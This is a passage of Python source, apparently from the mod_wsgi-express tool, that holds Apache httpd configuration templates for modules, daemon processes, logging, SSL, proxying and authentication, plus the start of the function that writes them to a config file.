return '#0' try: import pwd uid = os.getuid() entry = pwd.getpwuid(uid) except KeyError: return '#%d' % uid try: import grp gid = entry.pw_gid return grp.getgrgid(gid).gr_name except KeyError: return '#%d' % gid def find_program(names, default=None, paths=[]): for name in names: for path in os.environ['PATH'].split(':') + paths: program = posixpath.join(path, name) if os.path.exists(program): return program return default def find_mimetypes(): if os.name == 'nt': return posixpath.join(posixpath.dirname(posixpath.dirname( apxs_config.HTTPD)), 'conf', 'mime.types') else: import mimetypes for name in mimetypes.knownfiles: if os.path.exists(name): return name else: return '/dev/null' SHELL = find_program(['bash', 'sh'], ['/usr/local/bin']) APACHE_GENERAL_CONFIG = """ <IfModule !version_module> LoadModule version_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_version.so' </IfModule> ServerName %(host)s ServerRoot '%(server_root)s' PidFile '%(pid_file)s' <IfVersion >= 2.4> DefaultRuntimeDir '%(server_root)s' </IfVersion> ServerTokens ProductOnly ServerSignature Off <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> User ${MOD_WSGI_USER} Group ${MOD_WSGI_GROUP} </IfDefine> <IfDefine MOD_WSGI_WITH_LISTENER_HOST> Listen %(host)s:%(port)s </IfDefine> <IfDefine !MOD_WSGI_WITH_LISTENER_HOST> Listen %(port)s </IfDefine> <IfVersion < 2.4> LockFile '%(server_root)s/accept.lock' </IfVersion> <IfVersion >= 2.4> <IfDefine MOD_WSGI_WITH_PHP5> <IfModule !mpm_event_module> <IfModule !mpm_worker_module> <IfModule !mpm_prefork_module> <IfDefine MOD_WSGI_MPM_EXISTS_PREFORK_MODULE> LoadModule mpm_prefork_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_prefork.so' </IfDefine> </IfModule> </IfModule> </IfModule> 
</IfDefine> </IfVersion> <IfVersion >= 2.4> <IfModule !mpm_event_module> <IfModule !mpm_worker_module> <IfModule !mpm_prefork_module> <IfDefine MOD_WSGI_MPM_ENABLE_EVENT_MODULE> LoadModule mpm_event_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_event.so' </IfDefine> <IfDefine MOD_WSGI_MPM_ENABLE_WORKER_MODULE> LoadModule mpm_worker_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_worker.so' </IfDefine> <IfDefine MOD_WSGI_MPM_ENABLE_PREFORK_MODULE> LoadModule mpm_prefork_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_prefork.so' </IfDefine> </IfModule> </IfModule> </IfModule> </IfVersion> <IfDefine MOD_WSGI_WITH_HTTP2> LoadModule http2_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_http2.so' </IfDefine> <IfVersion >= 2.4> <IfModule !access_compat_module> LoadModule access_compat_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_access_compat.so' </IfModule> <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> <IfModule !unixd_module> LoadModule unixd_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_unixd.so' </IfModule> </IfDefine> <IfModule !authn_core_module> LoadModule authn_core_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authn_core.so' </IfModule> <IfModule !authz_core_module> LoadModule authz_core_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authz_core.so' </IfModule> </IfVersion> <IfModule !authz_host_module> LoadModule authz_host_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authz_host.so' </IfModule> <IfModule !mime_module> LoadModule mime_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mime.so' </IfModule> <IfModule !rewrite_module> LoadModule rewrite_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_rewrite.so' </IfModule> <IfModule !alias_module> LoadModule alias_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_alias.so' </IfModule> <IfModule !dir_module> LoadModule dir_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_dir.so' </IfModule> <IfModule !env_module> LoadModule env_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_env.so' </IfModule> <IfModule !headers_module> LoadModule headers_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_headers.so' </IfModule> <IfModule !filter_module> LoadModule filter_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_filter.so' </IfModule> <IfDefine MOD_WSGI_DIRECTORY_LISTING> <IfModule !autoindex_module> LoadModule autoindex_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_autoindex.so' </IfModule> </IfDefine> <IfVersion >= 2.2.15> <IfModule !reqtimeout_module> LoadModule reqtimeout_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_reqtimeout.so' </IfModule> </IfVersion> <IfDefine MOD_WSGI_COMPRESS_RESPONSES> <IfModule !deflate_module> LoadModule deflate_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_deflate.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_AUTH_USER> <IfModule !auth_basic_module> LoadModule auth_basic_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_auth_basic.so' </IfModule> <IfModule !auth_digest_module> LoadModule auth_digest_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_auth_digest.so' </IfModule> <IfModule !authz_user_module> LoadModule authz_user_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authz_user.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_WITH_PROXY> <IfModule !proxy_module> LoadModule proxy_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_proxy.so </IfModule> <IfModule !proxy_http_module> LoadModule proxy_http_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_proxy_http.so </IfModule> </IfDefine> <IfModule mpm_prefork_module> <IfDefine MOD_WSGI_WITH_PHP5> <IfModule !php5_module> Loadmodule php5_module '${MOD_WSGI_MODULES_DIRECTORY}/libphp5.so' </IfModule> AddHandler application/x-httpd-php .php </IfDefine> </IfModule> <IfDefine 
MOD_WSGI_LOAD_PYTHON_DYLIB> LoadFile '%(python_dylib)s' </IfDefine> LoadModule wsgi_module '%(mod_wsgi_so)s' <IfDefine MOD_WSGI_SERVER_METRICS> <IfModule !status_module> LoadModule status_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_status.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_CGID_SCRIPT> <IfModule !cgid_module> LoadModule cgid_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_cgid.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_CGI_SCRIPT> <IfModule !cgi_module> LoadModule cgi_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_cgi.so' </IfModule> </IfDefine> <IfVersion < 2.4> DefaultType text/plain </IfVersion> TypesConfig '%(mime_types)s' HostnameLookups Off MaxMemFree 64 Timeout %(socket_timeout)s ListenBacklog %(server_backlog)s <IfDefine MOD_WSGI_WITH_HTTP2> Protocols h2 h2c http/1.1 </IfDefine> <IfVersion >= 2.2.15> RequestReadTimeout %(request_read_timeout)s </IfVersion> LimitRequestBody %(limit_request_body)s <Directory /> AllowOverride None <IfVersion < 2.4> Order deny,allow Deny from all </IfVersion> <IfVersion >= 2.4> Require all denied </IfVersion> </Directory> WSGIPythonHome '%(python_home)s' WSGIVerboseDebugging '%(verbose_debugging_flag)s' <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> <IfDefine MOD_WSGI_WITH_SOCKET_PREFIX> WSGISocketPrefix %(socket_prefix)s/wsgi </IfDefine> <IfDefine !MOD_WSGI_WITH_SOCKET_PREFIX> WSGISocketPrefix %(server_root)s/wsgi </IfDefine> WSGISocketRotation Off </IfDefine> <IfDefine EMBEDDED_MODE> MaxConnectionsPerChild %(maximum_requests)s </IfDefine> <IfDefine DESTROY_INTERPRETER> WSGIDestroyInterpreter On </IfDefine> <IfDefine !DESTROY_INTERPRETER> WSGIDestroyInterpreter Off </IfDefine> <IfDefine !ONE_PROCESS> <IfDefine !EMBEDDED_MODE> WSGIRestrictEmbedded On <IfDefine MOD_WSGI_MULTIPROCESS> WSGIDaemonProcess %(host)s:%(port)s \\ display-name='%(daemon_name)s' \\ home='%(working_directory)s' \\ processes=%(processes)s \\ threads=%(threads)s \\ maximum-requests=%(maximum_requests)s \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ listen-backlog=%(daemon_backlog)s \\ queue-timeout=%(queue_timeout)s \\ socket-timeout=%(socket_timeout)s \\ connect-timeout=%(connect_timeout)s \\ request-timeout=%(request_timeout)s \\ inactivity-timeout=%(inactivity_timeout)s \\ startup-timeout=%(startup_timeout)s \\ deadlock-timeout=%(deadlock_timeout)s \\ graceful-timeout=%(graceful_timeout)s \\ eviction-timeout=%(eviction_timeout)s \\ restart-interval=%(restart_interval)s \\ cpu-time-limit=%(cpu_time_limit)s \\ shutdown-timeout=%(shutdown_timeout)s \\ send-buffer-size=%(send_buffer_size)s \\ receive-buffer-size=%(receive_buffer_size)s \\ header-buffer-size=%(header_buffer_size)s \\ response-buffer-size=%(response_buffer_size)s \\ response-socket-timeout=%(response_socket_timeout)s \\ server-metrics=%(server_metrics_flag)s </IfDefine> <IfDefine !MOD_WSGI_MULTIPROCESS> WSGIDaemonProcess %(host)s:%(port)s \\ display-name='%(daemon_name)s' \\ home='%(working_directory)s' \\ threads=%(threads)s \\ maximum-requests=%(maximum_requests)s \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ listen-backlog=%(daemon_backlog)s \\ queue-timeout=%(queue_timeout)s \\ socket-timeout=%(socket_timeout)s \\ connect-timeout=%(connect_timeout)s \\ request-timeout=%(request_timeout)s \\ inactivity-timeout=%(inactivity_timeout)s \\ startup-timeout=%(startup_timeout)s \\ deadlock-timeout=%(deadlock_timeout)s \\ graceful-timeout=%(graceful_timeout)s \\ 
eviction-timeout=%(eviction_timeout)s \\ restart-interval=%(restart_interval)s \\ cpu-time-limit=%(cpu_time_limit)s \\ shutdown-timeout=%(shutdown_timeout)s \\ send-buffer-size=%(send_buffer_size)s \\ receive-buffer-size=%(receive_buffer_size)s \\ response-buffer-size=%(response_buffer_size)s \\ response-socket-timeout=%(response_socket_timeout)s \\ server-metrics=%(server_metrics_flag)s </IfDefine> </IfDefine> </IfDefine> WSGICallableObject '%(callable_object)s' WSGIPassAuthorization On WSGIMapHEADToGET %(map_head_to_get)s <IfDefine MOD_WSGI_DISABLE_RELOADING> WSGIScriptReloading Off </IfDefine> <IfDefine EMBEDDED_MODE> <IfDefine MOD_WSGI_WITH_PYTHON_PATH> WSGIPythonPath '%(python_path)s' </IfDefine> </IfDefine> <IfDefine ONE_PROCESS> WSGIRestrictStdin Off <IfDefine MOD_WSGI_WITH_PYTHON_PATH> WSGIPythonPath '%(python_path)s' </IfDefine> </IfDefine> <IfDefine MOD_WSGI_SERVER_METRICS> ExtendedStatus On </IfDefine> WSGIServerMetrics %(server_metrics_flag)s <IfDefine MOD_WSGI_SERVER_STATUS> <Location /server-status> SetHandler server-status <IfVersion < 2.4> Order deny,allow Deny from all Allow from localhost </IfVersion> <IfVersion >= 2.4> Require all denied Require host localhost </IfVersion> </Location> </IfDefine> <IfDefine MOD_WSGI_KEEP_ALIVE> KeepAlive On KeepAliveTimeout %(keep_alive_timeout)s </IfDefine> <IfDefine !MOD_WSGI_KEEP_ALIVE> KeepAlive Off </IfDefine> <IfDefine MOD_WSGI_ENABLE_SENDFILE> EnableSendfile On WSGIEnableSendfile On </IfDefine> <IfDefine MOD_WSGI_COMPRESS_RESPONSES> AddOutputFilterByType DEFLATE text/plain AddOutputFilterByType DEFLATE text/html AddOutputFilterByType DEFLATE text/xml AddOutputFilterByType DEFLATE text/css AddOutputFilterByType DEFLATE text/javascript AddOutputFilterByType DEFLATE application/xhtml+xml AddOutputFilterByType DEFLATE application/javascript AddOutputFilterByType DEFLATE application/json </IfDefine> <IfDefine MOD_WSGI_ROTATE_LOGS> ErrorLog "|%(rotatelogs_executable)s \\ %(error_log_file)s.%%Y-%%m-%%d-%%H_%%M_%%S %(max_log_size)sM" </IfDefine> <IfDefine !MOD_WSGI_ROTATE_LOGS> ErrorLog "%(error_log_file)s" </IfDefine> LogLevel %(log_level)s <IfDefine MOD_WSGI_ERROR_LOG_FORMAT> ErrorLogFormat "%(error_log_format)s" </IfDefine> <IfDefine MOD_WSGI_ACCESS_LOG> <IfModule !log_config_module> LoadModule log_config_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_log_config.so </IfModule> LogFormat "%%h %%l %%u %%t \\"%%r\\" %%>s %%b" common LogFormat "%%h %%l %%u %%t \\"%%r\\" %%>s %%b \\"%%{Referer}i\\" \\"%%{User-agent}i\\"" combined LogFormat "%(access_log_format)s" custom <IfDefine MOD_WSGI_ROTATE_LOGS> CustomLog "|%(rotatelogs_executable)s \\ %(access_log_file)s.%%Y-%%m-%%d-%%H_%%M_%%S %(max_log_size)sM" %(log_format_nickname)s </IfDefine> <IfDefine !MOD_WSGI_ROTATE_LOGS> CustomLog "%(access_log_file)s" %(log_format_nickname)s </IfDefine> </IfDefine> <IfDefine MOD_WSGI_CHUNKED_REQUEST> WSGIChunkedRequest On </IfDefine> <IfDefine MOD_WSGI_WITH_PROXY_HEADERS> WSGITrustedProxyHeaders %(trusted_proxy_headers)s </IfDefine> <IfDefine MOD_WSGI_WITH_TRUSTED_PROXIES> WSGITrustedProxies %(trusted_proxies)s </IfDefine> <IfDefine MOD_WSGI_WITH_HTTPS> <IfModule !ssl_module> LoadModule ssl_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_ssl.so </IfModule> </IfDefine> <IfModule mpm_prefork_module> <IfDefine !ONE_PROCESS> ServerLimit %(prefork_server_limit)s StartServers %(prefork_start_servers)s MaxClients %(prefork_max_clients)s MinSpareServers %(prefork_min_spare_servers)s MaxSpareServers %(prefork_max_spare_servers)s </IfDefine> <IfDefine ONE_PROCESS> ServerLimit 1 
StartServers 1 MaxClients 1 MinSpareServers 1 MaxSpareServers 1 </IfDefine> MaxRequestsPerChild 0 </IfModule> <IfModule mpm_worker_module> <IfDefine !ONE_PROCESS> ServerLimit %(worker_server_limit)s ThreadLimit %(worker_thread_limit)s StartServers %(worker_start_servers)s MaxClients %(worker_max_clients)s MinSpareThreads %(worker_min_spare_threads)s MaxSpareThreads %(worker_max_spare_threads)s ThreadsPerChild %(worker_threads_per_child)s </IfDefine> <IfDefine ONE_PROCESS> ServerLimit 1 ThreadLimit 1 StartServers 1 MaxClients 1 MinSpareThreads 1 MaxSpareThreads 1 ThreadsPerChild 1 </IfDefine> MaxRequestsPerChild 0 ThreadStackSize 262144 </IfModule> <IfModule mpm_event_module> <IfDefine !ONE_PROCESS> ServerLimit %(worker_server_limit)s ThreadLimit %(worker_thread_limit)s StartServers %(worker_start_servers)s MaxClients %(worker_max_clients)s MinSpareThreads %(worker_min_spare_threads)s MaxSpareThreads %(worker_max_spare_threads)s ThreadsPerChild %(worker_threads_per_child)s </IfDefine> <IfDefine ONE_PROCESS> ServerLimit 1 ThreadLimit 1 StartServers 1 MaxClients 1 MinSpareThreads 1 MaxSpareThreads 1 ThreadsPerChild 1 </IfDefine> MaxRequestsPerChild 0 ThreadStackSize 262144 </IfModule> <IfDefine !MOD_WSGI_VIRTUAL_HOST> <IfVersion < 2.4> NameVirtualHost *:%(port)s </IfVersion> <VirtualHost _default_:%(port)s> </VirtualHost> </IfDefine> <IfDefine MOD_WSGI_VIRTUAL_HOST> <IfVersion < 2.4> NameVirtualHost *:%(port)s </IfVersion> <VirtualHost _default_:%(port)s> <Location /> <IfVersion < 2.4> Order deny,allow Deny from all </IfVersion> <IfVersion >= 2.4> Require all denied </IfVersion> <IfDefine MOD_WSGI_ALLOW_LOCALHOST> Allow from localhost </IfDefine> </Location> </VirtualHost> <IfDefine !MOD_WSGI_HTTPS_ONLY> <VirtualHost *:%(port)s> ServerName %(server_name)s <IfDefine MOD_WSGI_SERVER_ALIAS> ServerAlias %(server_aliases)s </IfDefine> </VirtualHost> <IfDefine MOD_WSGI_REDIRECT_WWW> <VirtualHost *:%(port)s> ServerName %(parent_domain)s Redirect permanent / http://%(server_name)s:%(port)s/ </VirtualHost> </IfDefine> </IfDefine> <IfDefine MOD_WSGI_HTTPS_ONLY> <VirtualHost *:%(port)s> ServerName %(server_name)s <IfDefine MOD_WSGI_SERVER_ALIAS> ServerAlias %(server_aliases)s </IfDefine> RewriteEngine On RewriteCond %%{HTTPS} off RewriteRule (.*) https://%(server_name)s:%(https_port)s%%{REQUEST_URI} </VirtualHost> <IfDefine MOD_WSGI_REDIRECT_WWW> <VirtualHost *:%(port)s> ServerName %(parent_domain)s RewriteEngine On RewriteCond %%{HTTPS} off RewriteRule (.*) https://%(server_name)s:%(https_port)s%%{REQUEST_URI} </VirtualHost> </IfDefine> </IfDefine> </IfDefine> <IfDefine MOD_WSGI_VIRTUAL_HOST> <IfDefine MOD_WSGI_WITH_HTTPS> <IfDefine MOD_WSGI_WITH_LISTENER_HOST> Listen %(host)s:%(https_port)s </IfDefine> <IfDefine !MOD_WSGI_WITH_LISTENER_HOST> Listen %(https_port)s </IfDefine> <IfVersion < 2.4> NameVirtualHost *:%(https_port)s </IfVersion> <VirtualHost _default_:%(https_port)s> <Location /> <IfVersion < 2.4> Order deny,allow Deny from all </IfVersion> <IfVersion >= 2.4> Require all denied </IfVersion> <IfDefine MOD_WSGI_ALLOW_LOCALHOST> Allow from localhost </IfDefine> </Location> SSLEngine On SSLCertificateFile %(ssl_certificate_file)s SSLCertificateKeyFile %(ssl_certificate_key_file)s <IfDefine MOD_WSGI_VERIFY_CLIENT> SSLCACertificateFile %(ssl_ca_certificate_file)s SSLVerifyClient none </IfDefine> <IfDefine MOD_WSGI_CERTIFICATE_CHAIN> SSLCertificateChainFile %(ssl_certificate_chain_file)s </IfDefine> </VirtualHost> <VirtualHost *:%(https_port)s> ServerName %(server_name)s <IfDefine 
MOD_WSGI_SERVER_ALIAS> ServerAlias %(server_aliases)s </IfDefine> SSLEngine On SSLCertificateFile %(ssl_certificate_file)s SSLCertificateKeyFile %(ssl_certificate_key_file)s <IfDefine MOD_WSGI_VERIFY_CLIENT> SSLCACertificateFile %(ssl_ca_certificate_file)s SSLVerifyClient none </IfDefine> <IfDefine MOD_WSGI_CERTIFICATE_CHAIN> SSLCertificateChainFile %(ssl_certificate_chain_file)s </IfDefine> <IfDefine MOD_WSGI_HTTPS_ONLY> <IfDefine MOD_WSGI_HSTS_POLICY> Header set Strict-Transport-Security %(hsts_policy)s </IfDefine> </IfDefine> <IfDefine MOD_WSGI_SSL_ENVIRONMENT> SSLOptions +StdEnvVars </IfDefine> </VirtualHost> <IfDefine MOD_WSGI_REDIRECT_WWW> <VirtualHost *:%(https_port)s> ServerName %(parent_domain)s Redirect permanent / https://%(server_name)s:%(https_port)s/ SSLEngine On SSLCertificateFile %(ssl_certificate_file)s SSLCertificateKeyFile %(ssl_certificate_key_file)s <IfDefine MOD_WSGI_VERIFY_CLIENT> SSLCACertificateFile %(ssl_ca_certificate_file)s SSLVerifyClient none </IfDefine> <IfDefine MOD_WSGI_CERTIFICATE_CHAIN> SSLCertificateChainFile %(ssl_certificate_chain_file)s </IfDefine> </VirtualHost> </IfDefine> </IfDefine> </IfDefine> DocumentRoot '%(document_root)s' AccessFileName .htaccess <Directory '%(server_root)s'> AllowOverride %(allow_override)s <Files handler.wsgi> <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Files> </Directory> <Directory '%(document_root)s'> AllowOverride %(allow_override)s <IfDefine MOD_WSGI_DIRECTORY_INDEX> DirectoryIndex %(directory_index)s </IfDefine> <IfDefine MOD_WSGI_DIRECTORY_LISTING> Options +Indexes </IfDefine> <IfDefine MOD_WSGI_CGI_SCRIPT> Options +ExecCGI </IfDefine> <IfDefine MOD_WSGI_CGID_SCRIPT> Options +ExecCGI </IfDefine> RewriteEngine On Include %(rewrite_rules)s <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> <Directory '%(document_root)s%(mount_point)s'> <IfDefine !MOD_WSGI_STATIC_ONLY> RewriteCond %%{REQUEST_FILENAME} !-f <IfDefine MOD_WSGI_DIRECTORY_INDEX> RewriteCond %%{REQUEST_FILENAME} !-d </IfDefine> <IfDefine MOD_WSGI_SERVER_STATUS> RewriteCond %%{REQUEST_URI} !/server-status </IfDefine> RewriteRule .* - [H=wsgi-handler] </IfDefine> </Directory> <IfDefine MOD_WSGI_ERROR_OVERRIDE> WSGIErrorOverride On </IfDefine> <IfDefine MOD_WSGI_HOST_ACCESS> <Location /> WSGIAccessScript '%(host_access_script)s' </Location> </IfDefine> <IfDefine MOD_WSGI_AUTH_USER> <Location /> AuthType %(auth_type)s AuthName '%(host)s:%(port)s' Auth%(auth_type)sProvider wsgi WSGIAuthUserScript '%(auth_user_script)s' <IfDefine MOD_WSGI_AUTH_GROUP> WSGIAuthGroupScript '%(auth_group_script)s' </IfDefine> <IfVersion < 2.4> Require valid-user <IfDefine MOD_WSGI_AUTH_GROUP> Require wsgi-group '%(auth_group)s' </IfDefine> </IfVersion> <IfVersion >= 2.4> <RequireAll> Require valid-user <IfDefine MOD_WSGI_AUTH_GROUP> Require wsgi-group '%(auth_group)s' </IfDefine> </RequireAll> </IfVersion> </Location> </IfDefine> <IfDefine !ONE_PROCESS> <IfDefine !EMBEDDED_MODE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ process-group='%(host)s:%(port)s' application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ process-group='%(host)s:%(port)s' application-group=%%{GLOBAL} </IfDefine> </IfDefine> <IfDefine EMBEDDED_MODE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ process-group='%%{GLOBAL}' application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ 
process-group='%%{GLOBAL}' application-group=%%{GLOBAL} </IfDefine> <IfDefine ONE_PROCESS> <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ process-group='%%{GLOBAL}' application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ process-group='%%{GLOBAL}' application-group=%%{GLOBAL} </IfDefine> <IfDefine MOD_WSGI_MPM_ENABLE_WINNT_MODULE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ application-group=%%{GLOBAL} </IfDefine> </IfDefine> """ APACHE_IGNORE_ACTIVITY_CONFIG = """ <Location '%(url)s'> WSGIIgnoreActivity On </Location> """ APACHE_PROXY_PASS_MOUNT_POINT_CONFIG = """ ProxyPass '%(mount_point)s' '%(url)s' ProxyPassReverse '%(mount_point)s' '%(url)s' <Location '%(mount_point)s'> RewriteEngine On RewriteRule .* - [E=SERVER_PORT:%%{SERVER_PORT},NE] RequestHeader set X-Forwarded-Port %%{SERVER_PORT}e RewriteCond %%{HTTPS} on RewriteRule .* - [E=URL_SCHEME:https,NE] RequestHeader set X-Forwarded-Scheme %%{URL_SCHEME}e env=URL_SCHEME </Location> """ APACHE_PROXY_PASS_MOUNT_POINT_SLASH_CONFIG = """ ProxyPass '%(mount_point)s/' '%(url)s/' ProxyPassReverse '%(mount_point)s/' '%(url)s/' <Location '%(mount_point)s/'> RewriteEngine On RewriteRule .* - [E=SERVER_PORT:%%{SERVER_PORT},NE] RequestHeader set X-Forwarded-Port %%{SERVER_PORT}e RewriteCond %%{HTTPS} on RewriteRule .* - [E=URL_SCHEME:https,NE] RequestHeader set X-Forwarded-Scheme %%{URL_SCHEME}e env=URL_SCHEME </Location> <LocationMatch '^%(mount_point)s$'> RewriteEngine On RewriteRule - http://%%{HTTP_HOST}%%{REQUEST_URI}/ [R=302,L] </LocationMatch> """ APACHE_PROXY_PASS_HOST_CONFIG = """ <VirtualHost *:%(port)s> ServerName %(host)s ProxyPass / '%(url)s' ProxyPassReverse / '%(url)s' RequestHeader set X-Forwarded-Port %(port)s RewriteEngine On RewriteCond %%{HTTPS} on RewriteRule .* - [E=URL_SCHEME:https,NE] RequestHeader set X-Forwarded-Scheme %%{URL_SCHEME}e env=URL_SCHEME </VirtualHost> """ APACHE_ALIAS_DIRECTORY_CONFIG = """ Alias '%(mount_point)s' '%(directory)s' <Directory '%(directory)s'> AllowOverride %(allow_override)s <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> """ APACHE_ALIAS_FILENAME_CONFIG = """ Alias '%(mount_point)s' '%(directory)s/%(filename)s' <Directory '%(directory)s'> <Files '%(filename)s'> <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Files> </Directory> """ APACHE_ALIAS_DOCUMENTATION = """ Alias /__wsgi__/docs '%(documentation_directory)s' Alias /__wsgi__/images '%(images_directory)s' <Directory '%(documentation_directory)s'> DirectoryIndex index.html <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> <Directory '%(images_directory)s'> <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> """ APACHE_VERIFY_CLIENT_CONFIG = """ <IfDefine MOD_WSGI_VERIFY_CLIENT> <Location '%(path)s'> SSLVerifyClient require SSLVerifyDepth 1 </Location> </IfDefine> """ APACHE_ERROR_DOCUMENT_CONFIG = """ ErrorDocument '%(status)s' '%(document)s' """ APACHE_SETENV_CONFIG = """ SetEnv '%(name)s' '%(value)s' """ APACHE_PASSENV_CONFIG = """ PassEnv '%(name)s' """ APACHE_HANDLER_SCRIPT_CONFIG = """ WSGIHandlerScript wsgi-resource '%(server_root)s/resource.wsgi' \\ 
process-group='%(host)s:%(port)s' application-group=%%{GLOBAL} """ APACHE_HANDLER_CONFIG = """ AddHandler %(handler)s %(extension)s """ APACHE_INCLUDE_CONFIG = """ Include '%(filename)s' """ APACHE_TOOLS_CONFIG = """ WSGIDaemonProcess express display-name=%%{GROUP} threads=1 server-metrics=On """ APACHE_METRICS_CONFIG = """ WSGIImportScript '%(server_root)s/server-metrics.py' \\ process-group=express application-group=server-metrics """ APACHE_SERVICE_CONFIG = """ WSGIDaemonProcess 'service:%(name)s' \\ display-name=%%{GROUP} \\ user='%(user)s' \\ group='%(group)s' \\ home='%(working_directory)s' \\ threads=0 \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ server-metrics=%(server_metrics_flag)s WSGIImportScript '%(script)s' \\ process-group='service:%(name)s' \\ application-group=%%{GLOBAL} """ APACHE_SERVICE_WITH_LOG_CONFIG = """ <VirtualHost *:%(port)s> <IfDefine MOD_WSGI_ROTATE_LOGS> ErrorLog "|%(rotatelogs_executable)s \\ %(log_directory)s/%(log_file)s.%%Y-%%m-%%d-%%H_%%M_%%S %(max_log_size)sM" </IfDefine> <IfDefine !MOD_WSGI_ROTATE_LOGS> ErrorLog "%(log_directory)s/%(log_file)s" </IfDefine> WSGIDaemonProcess 'service:%(name)s' \\ display-name=%%{GROUP} \\ user='%(user)s' \\ group='%(group)s' \\ home='%(working_directory)s' \\ threads=0 \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ server-metrics=%(server_metrics_flag)s WSGIImportScript '%(script)s' \\ process-group='service:%(name)s' \\ application-group=%%{GLOBAL} </VirtualHost> """ def generate_apache_config(options): with open(options['httpd_conf'], 'w') as fp: print(APACHE_GENERAL_CONFIG % options, file=fp) if options['ignore_activity']: for url in options['ignore_activity']: print(APACHE_IGNORE_ACTIVITY_CONFIG % dict(url=url), file=fp) if options['proxy_mount_points']: for mount_point, url in options['proxy_mount_points']: if mount_point.endswith('/'): print(APACHE_PROXY_PASS_MOUNT_POINT_CONFIG % dict( mount_point=mount_point, url=url), file=fp) else: print(APACHE_PROXY_PASS_MOUNT_POINT_SLASH_CONFIG % dict( mount_point=mount_point, url=url), file=fp) if options['proxy_virtual_hosts']: for host, url in options['proxy_virtual_hosts']: print(APACHE_PROXY_PASS_HOST_CONFIG % dict( host=host, port=options['port'], url=url), file=fp) if options['url_aliases']: for mount_point, target in sorted(options['url_aliases'], reverse=True): path = posixpath.abspath(target) if os.path.isdir(path) or not os.path.exists(path): if target.endswith('/') and path != '/': directory = path + '/' else: directory = path print(APACHE_ALIAS_DIRECTORY_CONFIG % dict( mount_point=mount_point, directory=directory, allow_override=options['allow_override']), file=fp) else: directory = posixpath.dirname(path) filename = posixpath.basename(path) print(APACHE_ALIAS_FILENAME_CONFIG % dict( mount_point=mount_point, directory=directory, filename=filename), file=fp) if options['enable_docs']: print(APACHE_ALIAS_DOCUMENTATION % options, file=fp) if options['error_documents']: for status, document in options['error_documents']: print(APACHE_ERROR_DOCUMENT_CONFIG % dict(status=status, document=document.replace("'", "\\'")), file=fp) if options['ssl_verify_client_urls']: paths = sorted(options['ssl_verify_client_urls'], reverse=True) for path in paths: print(APACHE_VERIFY_CLIENT_CONFIG % dict(path=path), file=fp) else: print(APACHE_VERIFY_CLIENT_CONFIG % dict(path='/'), file=fp) if options['setenv_variables']: for name, value in 
